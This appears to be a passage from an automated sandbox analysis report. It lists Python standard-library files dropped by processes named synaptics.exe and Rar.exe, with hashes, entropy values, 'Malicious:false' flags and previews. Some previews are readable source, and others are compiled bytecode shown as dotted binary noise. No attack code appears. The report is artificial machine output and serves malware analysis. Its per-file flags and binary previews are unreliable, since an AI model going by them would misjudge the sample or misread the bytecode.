                                                                                                                                                                                                                                  Preview:o........'-d.6.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.a.d.d...Z.d.Z.d.Z.e.e.j.j...Z.e...d...Z.d.Z.d.Z.d.d...Z.d.Z.d.d...Z.g.d...Z g.d...Z!g.Z"e!D.].Z#e".$e#.%......qadid.d...Z&did.d...Z'd.d.d.d.d...Z(e...d.e.j)..Z*d.d...Z+d.d...Z,e...d.e.j)..Z-e...d.e.j.e.j)B...Z/e...d e.j0e.j)B...Z1d!d"..Z2e...d#e.j0e.j)B...Z3d$d%..Z4d&d'..Z5e...d(..Z6e...d)..Z7e...d*..Z8e...d+..Z9d,d-..Z:e...d...Z;d/d0..Z<d1d2..Z=d3d4..Z>e...d5e.j)..Z?d6d7..Z@d8d9..ZAd:d;..ZBd<d=..ZCe...d>e.j)..ZDd?d@..ZEdAdB..ZFdCdD..ZGdEdF..ZHdGZIe...dH..ZJdIdJ..ZKdKdL..ZLdMdN..ZMdOdP..ZNG.dQdR..dR..ZOG.dSdT..dT..ZPG.dUdV..dVeP..ZQdWdX..ZRdYdZ..ZSG.d[d\..d\..ZTG.d]d^..d^..ZUG.d_d`..d`eV..ZWG.dadb..dbeU..ZXdcdd..ZYG.dedf..dfeX..ZZG.dgdh..dheX..Z[d.S.)ja....HTTP cookie handling for web clients...This module has (now fairly distant) origins in Gisle Aas' Perl module.HTTP::Cookies, from the libwww-perl library...Docstrings, comments and debug
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15349
                                                                                                                                                                                                                                  Entropy (8bit):5.4472729352887805
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:Ld6ZJt/SHD+IfhNGV10wqP+6JdMYFGBCeA4Gm0Ir7bDQs61vwOQY2jxP+Qh3lL44:pWJtS+Ifh8D0wqP+6JdMYsBrA4GmzfbX
                                                                                                                                                                                                                                  MD5:21445DC41A48444DCC20AD8F79AD2766
                                                                                                                                                                                                                                  SHA1:DCE8B764793CA5B56116425794190CCB7EF4A233
                                                                                                                                                                                                                                  SHA-256:81785FA43D1DB00BA972CA09EB6A8A47B90F4EBC2E23102469374B1535C293DB
                                                                                                                                                                                                                                  SHA-512:E0D24ADBB7F0DA54F5752AB367A4AB3A29F11738088E0154B1CEA5FCEFD5ABB4DB2F84A3733AF53A9387385D22C0B8DD9053951A904474C3895BB9F42FF26D83
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dfR.......................@...sZ...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.j.Z.d.j.Z.d.j.Z.G.d.d...d.e...Z.e.j.e.j...d...Z.e.d...Z.d.d...e.e.d.....e.e.e.e.......D...Z.e...e.d...d.e.d...d.i.....e...d.e...e.......j.Z.d.d...Z.e...d...Z.e...d...Z.d.d...Z.g.d...Z.g.d...Z.d.e.e.f.d.d...Z.G.d.d...d.e ..Z!d.Z"e"d ..Z#e...d!e"..d"..e#..d#..e.j$e.j%B...Z&G.d$d%..d%e ..Z'G.d&d'..d'e'..Z(d.S.)(a.....Here's a sample session to show how to use this module..At the moment, this is the only documentation...The Basics.----------..Importing is easy..... >>> from http import cookies..Most of the time you start by creating a cookie... >>> C = cookies.SimpleCookie()..Once you've created your Cookie, you can add values just as if it were.a dictionary... >>> C = cookies.SimpleCookie(). >>> C["fig"] = "newton". >>> C["sugar"] = "wafer". >>> C.output(). 'Set-Cookie: fig=newton\r\nSet-Cookie: sugar=wafer'..Notice that the printable representation of a Cookie is the.appropriate format for a
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):58321
                                                                                                                                                                                                                                  Entropy (8bit):4.406436591744728
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:l3z+32B5SQi1oScyNzBooOSlNcVkACLogKRkRAW5U:l3z+32B5SQi1oScyNzBooOSl4CLoRkRM
                                                                                                                                                                                                                                  MD5:5D6BFC608ECF70840D6DE2795FD69F1F
                                                                                                                                                                                                                                  SHA1:17F160F07B156F498D251E189408CBFC5730EA86
                                                                                                                                                                                                                                  SHA-256:1E627D49863719FE81EEC9EC3CE3A11263E24848F7F9A0DC01DF515971E6ACF5
                                                                                                                                                                                                                                  SHA-512:AB562C2CB8243109F74C44AD157EA470181581114D42907F76B89B65B7CAAD745B6C0EF39F91AAA02146F1E67C68A244FFFDC0B00E83405A34060E4F84DD0655
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:r"""HTTP/1.1 client library....<intro stuff goes here>..<other stuff, too>....HTTPConnection goes through a number of "states", which define when a client..may legally make another request or fetch the response for a particular..request. This diagram details these state transitions:.... (null).. |.. | HTTPConnection().. v.. Idle.. |.. | putrequest().. v.. Request-started.. |.. | ( putheader() )* endheaders().. v.. Request-sent.. |\_____________________________.. | | getresponse() raises.. | response = getresponse() | ConnectionError.. v v.. Unread-response Idle.. [Response-headers-read].. |\____________________.. | |.. | response.read() | putrequest().. v v.. Idle Req-started-unread-response.. ______/|.. /
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):79540
                                                                                                                                                                                                                                  Entropy (8bit):4.458584258215225
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:Gsf5OCLTKr88g99gZ5m2SLbzf7bbV2VwRyx67wF:G037jgZ5YD/I6Rs6UF
                                                                                                                                                                                                                                  MD5:C1F3927D2E339DE399959A069F045EC6
                                                                                                                                                                                                                                  SHA1:B70C655321DBD6F9D95342962FFE39BDA26CCBAF
                                                                                                                                                                                                                                  SHA-256:55A941BAB49900DC61701C80397554F2F79BF235A26D75DCFF96D20278097D87
                                                                                                                                                                                                                                  SHA-512:548E40EB51392C99C16A241A12CDBBDD0C4697BC1A4CEF3F6E7AF7BCB966AD41D6EE88E899A9C86735246CDEC569A4155362E4D614E0925921097928EE9A3978
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:r"""HTTP cookie handling for web clients.....This module has (now fairly distant) origins in Gisle Aas' Perl module..HTTP::Cookies, from the libwww-perl library.....Docstrings, comments and debug strings in this code refer to the..attributes of the HTTP cookie system as cookie-attributes, to distinguish..them clearly from Python attributes.....Class diagram (note that BSDDBCookieJar and the MSIE* classes are not..distributed with the Python standard library, but are available from..http://wwwsearch.sf.net/):.... CookieJar____.. / \ \.. FileCookieJar \ \.. / | \ \ \.. MozillaCookieJar | LWPCookieJar \ \.. | | \.. | ---MSIEBase | \.. | / | | \.. | / MSIEDBCookieJar BSDDBCookieJar.. |/.. MSIECookieJar...."""....__all__ = ['Cookie', 'Cook
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21094
                                                                                                                                                                                                                                  Entropy (8bit):4.737928355464598
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:ShNUZtUx0dqJ1sJxttmT+tOVVyeuPFcLIcfOuu7jvxyXWNYN:ShNUZmx0dCsNPFGIcfyM+YN
                                                                                                                                                                                                                                  MD5:BB19E50B174A51A5972C7DFD8F142ADB
                                                                                                                                                                                                                                  SHA1:FE6E9FB17F72042FF2EF00FC6E7F5C51631D2F3C
                                                                                                                                                                                                                                  SHA-256:D049D9DE921DD9A2D13CD205FC0ABED14691CDDC8BA6F3C174653AF938ECD79F
                                                                                                                                                                                                                                  SHA-512:993B3238D231137B5E703FC4ADC0FD2A263A6EB7D07FDBFCA11DEEC422184A99C8ABAD6F2CE8F6A36C253D5967BAE8BA921261C636BE4F4B4A3B7D22A05EB27A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:####..# Copyright 2000 by Timothy O'Malley <timo@alum.mit.edu>..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software..# and its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of..# Timothy O'Malley not be used in advertising or publicity..# pertaining to distribution of the software without specific, written..# prior permission...#..# Timothy O'Malley DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS..# SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY..# AND FITNESS, IN NO EVENT SHALL Timothy O'Malley BE LIABLE FOR..# ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES..# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,..# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS..# ACTION, ARISING
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):49514
                                                                                                                                                                                                                                  Entropy (8bit):4.578488993320622
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:lfngUjS+gSOsV6f0aKucGIEgA0Bw4ETVp5tU6N0YO:lvgUjS+7OsVQ0aKucGIEOBuTZN0YO
                                                                                                                                                                                                                                  MD5:A0E7352D69843F9F999D3EC06678E1B4
                                                                                                                                                                                                                                  SHA1:7FF7AFC9FB2D5B14A6FDC80882642092F472EE90
                                                                                                                                                                                                                                  SHA-256:C97B4D93BF1BB9DD82916677A95EF73AA8E73374E3EB9244F2E8560410965AE4
                                                                                                                                                                                                                                  SHA-512:41729951BAE2E77B3EA235B54A9A1F21792F6D202E4A658D894CE8E6AB063B3AD4D9824D0EE1CC94A0F826808E197E1E2E1BE48308AB504E8EEB97B9AB474E9D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""HTTP server classes.....Note: BaseHTTPRequestHandler doesn't implement any HTTP request; see..SimpleHTTPRequestHandler for simple implementations of GET, HEAD and POST,..and CGIHTTPRequestHandler for CGI scripts.....It does, however, optionally implement HTTP/1.1 persistent connections,..as of version 0.3.....Notes on CGIHTTPRequestHandler..------------------------------....This class implements GET and POST requests to cgi-bin scripts.....If the os.fork() function is not present (e.g. on Windows),..subprocess.Popen() is used as a fallback, with slightly altered semantics.....In all cases, the implementation is intentionally naive -- all..requests are executed synchronously.....SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL..-- it may execute arbitrary Python code or external programs.....Note that status code 200 is sent prior to execution of a CGI script, so..scripts cannot send other status codes such as 302 (redirect).....XXX To do:....- log requests even
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):56515
                                                                                                                                                                                                                                  Entropy (8bit):4.687424781884806
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:LxnlDvnsQeIBol2eKsBKOgE1IFWv4wem8YCY17JTBY:L9lbsQ5el2eKs4OgE1IFwDem8YN5Ri
                                                                                                                                                                                                                                  MD5:F26881E2906384DBE388BAFCC0A32393
                                                                                                                                                                                                                                  SHA1:9246F7D6A4DAD4FF9EA4BE73209A63A2B17CC2D3
                                                                                                                                                                                                                                  SHA-256:76B464DD9B86B5546E228A310B57C848F8B58533FDFBD19A95F55381192CA508
                                                                                                                                                                                                                                  SHA-512:2D45809961FDA91A0D7A9F2294FC0F865A05589FF2910C54B7A714175FB09DCAA5B760641F48520B11FDF3DEBDF992CE56873537B61EC826F4623FAF4A33D08B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""IMAP4 client.....Based on RFC 2060.....Public class: IMAP4..Public variable: Debug..Public functions: Internaldate2tuple.. Int2AP.. ParseFlags.. Time2Internaldate.."""....# Author: Piers Lauder <piers@cs.su.oz.au> December 1997...#..# Authentication code contributed by Donn Cave <donn@u.washington.edu> June 1998...# String method conversion by ESR, February 2001...# GET/SETACL contributed by Anthony Baxter <anthony@interlink.com.au> April 2001...# IMAP4_SSL contributed by Tino Lange <Tino.Lange@isg.de> March 2002...# GET/SETQUOTA contributed by Andreas Zeidler <az@kreativkombinat.de> June 2002...# PROXYAUTH contributed by Rick Holbert <holbert.13@osu.edu> November 2002...# GET/SETANNOTATION contributed by Tomas Lindroos <skitta@abo.fi> June 2005.....__version__ = "2.58"....import binascii, errno, random, re, socket, subprocess, sys, time, calendar..from datetime import datetime, timezone, tim
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3976
                                                                                                                                                                                                                                  Entropy (8bit):4.730395972681575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:MwbIH3M4Hmme6v5At+TXksO2E2+kqaQG6q8GjHjKkz:MRDcaKs/QCpjHjKkz
                                                                                                                                                                                                                                  MD5:DFFC1936F5CECC4DD8901EA2B924BA1D
                                                                                                                                                                                                                                  SHA1:7A09F45AE6DE63DABFD951C904ACBD1BB6316D76
                                                                                                                                                                                                                                  SHA-256:E01288F17006090085CE2CEFB5C8CE94BF0E7D441EEC70BA57BD70034C886899
                                                                                                                                                                                                                                  SHA-512:2F826D923DD26CB58EAD8F2CB7D56B7C3317D59EF0CDA51C8BA0B126DE39946286F75978249150F3828C088C5A01F605895081262A90A6DD51B763B2C34AFBE2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Recognize image file formats based on their first few bytes."""....from os import PathLike....__all__ = ["what"]....#-------------------------#..# Recognize image headers #..#-------------------------#....def what(file, h=None):.. f = None.. try:.. if h is None:.. if isinstance(file, (str, PathLike)):.. f = open(file, 'rb').. h = f.read(32).. else:.. location = file.tell().. h = file.read(32).. file.seek(location).. for tf in tests:.. res = tf(h, f).. if res:.. return res.. finally:.. if f: f.close().. return None......#---------------------------------#..# Subroutines per image file type #..#---------------------------------#....tests = []....def test_jpeg(h, f):.. """JPEG data in JFIF or Exif format""".. if h[6:10] in (b'JFIF', b'Exif'):.. return 'jpeg'....tests.append(test_jpeg)....def test_png(h, f):..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10937
                                                                                                                                                                                                                                  Entropy (8bit):4.78644206171614
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:w7D45FhQzMd3kVK+bhhVA02690t/93v5lGbqRDnZfOmSdF2p:wg+WkVK+lhVAuU9xlGuR1nW2p
                                                                                                                                                                                                                                  MD5:B961B5EA8D2A81594CB59270C55A9412
                                                                                                                                                                                                                                  SHA1:68C059B59A0FB1E697F56DE9894842E07EF549DB
                                                                                                                                                                                                                                  SHA-256:22455CCD2ECA0C0F032603FCEF28684DF795450E402C1E98AC8039AC9E6CA5E6
                                                                                                                                                                                                                                  SHA-512:6B04010B64BA3232CE1401DEA03FA97E12E374D168EA9F1E441B60D532F45B53D56814AC73EB78B0AE32C0F2CAAF0E2CDA802A8FF10E28D7EAA73CFAA6220874
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""This module provides the components needed to build your own __import__..function. Undocumented functions are obsolete.....In most cases it is preferred you consider using the importlib module's..functionality over this module....."""..# (Probably) need to stay in _imp..from _imp import (lock_held, acquire_lock, release_lock,.. get_frozen_object, is_frozen_package,.. init_frozen, is_builtin, is_frozen,.. _fix_co_filename)..try:.. from _imp import create_dynamic..except ImportError:.. # Platform doesn't support dynamic loading... create_dynamic = None....from importlib._bootstrap import _ERR_MSG, _exec, _load, _builtin_from_name..from importlib._bootstrap_external import SourcelessFileLoader....from importlib import machinery..from importlib import util..import importlib..import os..import sys..import tokenize..import types..import warnings....warnings.warn("the imp module is deprecated in favour of importlib and slated "..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6265
                                                                                                                                                                                                                                  Entropy (8bit):4.606670655660399
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:4tH2fRvVSnhV4kSSNOyKGk+SNplpIZvYZwPbBbrx5To141x41YLat9RH++3mTWtj:glz4vSNGGXSNV4bRrqs41Jt9RJmCt/hV
                                                                                                                                                                                                                                  MD5:DBE317F92FE33213AA2410A2479B9C54
                                                                                                                                                                                                                                  SHA1:29DDC88364C936E2D4FF3EA9B14F2176AC6A4230
                                                                                                                                                                                                                                  SHA-256:6D4AB4726790393388B483A56966276861EB3353731646572774FFA90B68289E
                                                                                                                                                                                                                                  SHA-512:07D0E99B5CFA1608E74279B5FF5E03D49B714C5B78F2B4FB3839CBE9A3133FE076650BF2C490736F7D88BB3584701F5931D9BB457C3A618AEA5C8DDEA3112431
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""A pure Python implementation of import."""..__all__ = ['__import__', 'import_module', 'invalidate_caches', 'reload']....# Bootstrap help #####################################################....# Until bootstrapping is complete, DO NOT import any modules that attempt..# to import importlib._bootstrap (directly or indirectly). Since this..# partially initialised package would be present in sys.modules, those..# modules would get an uninitialised copy of the source version, instead..# of a fully initialised version (either the frozen one or the one..# initialised below if the frozen one is not available)...import _imp # Just the builtin component, NOT the full Python module..import sys....try:.. import _frozen_importlib as _bootstrap..except ImportError:.. from . import _bootstrap.. _bootstrap._setup(sys, _imp)..else:.. # importlib._bootstrap is the built-in import, ensure we don't create.. # a second copy of the module... _bootstrap.__name__ = 'importlib._bootstrap
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3816
                                                                                                                                                                                                                                  Entropy (8bit):5.548429869472314
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:6uKEn4Gs1xwkB8QpIXEz66QncxK1p9W0j+VZzmF2Q8yIcOr:QEkloMK1a0j+DmF2QZIh
                                                                                                                                                                                                                                  MD5:C6252648F8F82DEF2CD4D890469A6990
                                                                                                                                                                                                                                  SHA1:6EB64F38F31AE912A6BAF49F9E382AA3A902F39C
                                                                                                                                                                                                                                  SHA-256:F403714CC2CCF0C532B2FF9F4B7BB604E878A8D1B44DDDC77BDDE71323031298
                                                                                                                                                                                                                                  SHA-512:C4DB2AFB1E023A36616814C9467CDFD9B3E8F95697C85188E4188DB3A822B9A14A3897BFF9ED801C602599B3E16037689E4810A68A439AD9A77C17FC53B028DC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dy........................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y)......d.d.l.m.Z...e...e.e.....Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.yB......Y.n.w.e.e.j.d.<.z.d.d.l.Z.W.n...e.ye......d.d.l.m.Z...e...e.....e.e._.Y.n.w.d.e._.d.e._.z.e...d.d...e._.W.n...e.y~......Y.n.w.e.e.j.d.<.e.j.Z.e.j.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.i.Z.d.d...Z.d.S.).z'A pure Python implementation of import.)...__import__..import_module..invalidate_caches..reload.....N.....)..._bootstrapz.importlib._bootstrap..importlibz.__init__.pyz._bootstrap.py)..._bootstrap_externalz.importlib._bootstrap_externalz._bootstrap_external.py).r....c....................C...s"...t.j.D.].}.t.|.d...r.|.......q.d.S.).zmCall the invalidate_caches() method on all meta path finders stored in. sys.meta_path (where implemented).r....N)...sys..meta_path..hasattrr....)...finder..r.....4C:\Users\Public\M20EKMMEH2\lib\importlib\__init__.pyr....A...s..............r....c....................C...s...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1982
                                                                                                                                                                                                                                  Entropy (8bit):5.029787284088814
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:eGYO7KXEXsl7Xrqj9FXHRLSVRibTAsKhnsRyy:MrEXEXrqhFXHPTbIsZ
                                                                                                                                                                                                                                  MD5:6624B3757A30073DDF57DE66E75762E7
                                                                                                                                                                                                                                  SHA1:0AC994D794FEFD5FDEFBD15F05B42D2EEBE6FA9D
                                                                                                                                                                                                                                  SHA-256:1702384AD105FF820C24E8B3A25439401637985CDADFA885D6B554580F963D2A
                                                                                                                                                                                                                                  SHA-512:007DA4F7FB94349587650545A776BC8A6C37CEB2BF993A76B3252019477F15AA860233598E7D7DAC818D676155B3586AE666CF2C8107E3B0654BE3A04AE17375
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-dr........................@...s8...d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.G.d.d...d.e.j.d...Z.d.S.).z>Subset of importlib.abc used to reduce importlib.util imports......)..._bootstrap.....Nc....................@...s(...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...Loaderz'Abstract base class for import loaders.c....................C...s....d.S.).z.Return a module to initialize and into which to load... This method should raise ImportError if anything prevents it. from creating a new module. It may return None to indicate. that the spec should create the new module.. N..)...self..specr....r.....0C:\Users\Public\M20EKMMEH2\lib\importlib\_abc.py..create_module....s......z.Loader.create_modulec....................C...s....t.|.d...s.t...t...|.|...S.).a....Return the loaded module... The module must be added to sys.modules and have import-related. attributes set properly. The fullname is a str... ImportError is raised on failure...
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3714
                                                                                                                                                                                                                                  Entropy (8bit):4.672565461372954
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:udimBhyWa11p/5cIBqNU79FhTEnKIgVFKOmuD79VsUKyO9WoK/UML9Qa:yhyWGfxxB99FhkKIgDKONrsUK39WoK/L
                                                                                                                                                                                                                                  MD5:4C4432E48B5FDBEB195792D570ACFA57
                                                                                                                                                                                                                                  SHA1:A8A487F996FC7D95D556D7677AF5BF7FFF295256
                                                                                                                                                                                                                                  SHA-256:4480D89F0E5C311CEA19033DAB959931FDEB75A55507F96FF9E7AB70EED91115
                                                                                                                                                                                                                                  SHA-512:1029AC0B4E11E142C08EC17B885D940E2EE7DCDDC82A6B4FBF830597537EEDF665716E23ED023D214E57D2F32D11B0B9744F00D5AD0664669AABACDD52A862AB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...sN...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d...Z.G.d.d...d...Z.d.d...Z.d.S.)......)...suppress.....)...abcc....................@...s(...e.Z.d.Z.d.Z.d.d...f.d.d...Z.d.d...Z.d.S.)...SpecLoaderAdapterz>. Adapt a package spec to adapt the underlying loader.. c....................C...s....|.j.S...N)...loader....spec..r.....5C:\Users\Public\M20EKMMEH2\lib\importlib\_adapters.py..<lambda>....s......z.SpecLoaderAdapter.<lambda>c....................C...s....|.|._.|.|...|._.d.S.r....).r....r....)...selfr....Z.adapterr....r....r......__init__....s........z.SpecLoaderAdapter.__init__c....................C........t.|.j.|...S.r....)...getattrr......r......namer....r....r......__getattr__...........z.SpecLoaderAdapter.__getattr__N)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............r....c....................@...s ...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.S.)...TraversableResourcesLoaderz9. Adapt a loader to
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2978
                                                                                                                                                                                                                                  Entropy (8bit):5.204342612952029
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MfiZ38jH+kP4PY+IINYalBABDu0ZLmJ2SOoHft3XlY2s03f/mm2vJviUeXrowab:MfipsH3AlYali7ZL7dillY2s033mm2vX
                                                                                                                                                                                                                                  MD5:E2A19479F3FA688DB6D83348C9BA3D27
                                                                                                                                                                                                                                  SHA1:3C169AC74D1217EDB641132A042D19BEF06958D7
                                                                                                                                                                                                                                  SHA-256:301A658455EE25240B503B9FA482004B876FAC1B8E013E68104AEA962BB53E72
                                                                                                                                                                                                                                  SHA-512:965E5592394BE8D6418BB8DB4426FBF142FA14BB4CF163C8BED46DF1896980F49BD53820C3A2CECE8E1A245FF2188D6565FBFAE0C0EF2348540890B99D84B285
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j.e.f...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.d.e.j.d...d.d.....Z.e.j.d.d.....Z.e...e.j...e.j.d.d.......Z d.S.)......N)...Union..Any..Optional.....)...ResourceReader..Traversable)...wrap_specc....................C...s....t.t.|.....S.).z3. Get a Traversable resource from a package. )...from_package..get_package)...package..r.....3C:\Users\Public\M20EKMMEH2\lib\importlib\_common.py..files....s......r....c....................C...s....t.|...}.t.j...|...\.}.}.|.r.t.|...d.......|.S.).z.Normalize a path by ensuring it is a string... If the resulting string contains path separators, an exception is raised.. z. must be only a file name)...str..os..path..split..ValueError).r....Z.str_path..parent..file_namer....r....r......normalize_path....s..............r....c....................C...s*...|.j.}.t.|.j.d.d...}.|.d.u.r
                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15902
                                                                                                                                                                                                                                  Entropy (8bit):5.108702443874358
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Ez+B5HGaViuYo8vEVbFCibM/50LbCb1EVMXS6O9PzXDPJ8OoEAuDdPTaX/DOWP6s:EeDVnR8gC/50LbjVMA9PrWCDaX/P6s
                                                                                                                                                                                                                                  MD5:0025F3087513E18D7047AA569CBA93A4
                                                                                                                                                                                                                                  SHA1:E60C8CC9C8E60F588A9A66AD734B76EE60A332F5
                                                                                                                                                                                                                                  SHA-256:2FFE628D16F1302A2116C70A3D75C21F6DE9F47392EA7BD5EDB2D1E198BFCA7D
                                                                                                                                                                                                                                  SHA-512:996747E0082A6575B3121EC110E2D5151F5F27052498D212683BD0C79F4C929A9B38FC7F11DFDBA25B8F2732187DCE4B6BB520AF2322D398C91977DC7E32B9C0
                                                                                                                                                                                                                                  Malicious:false
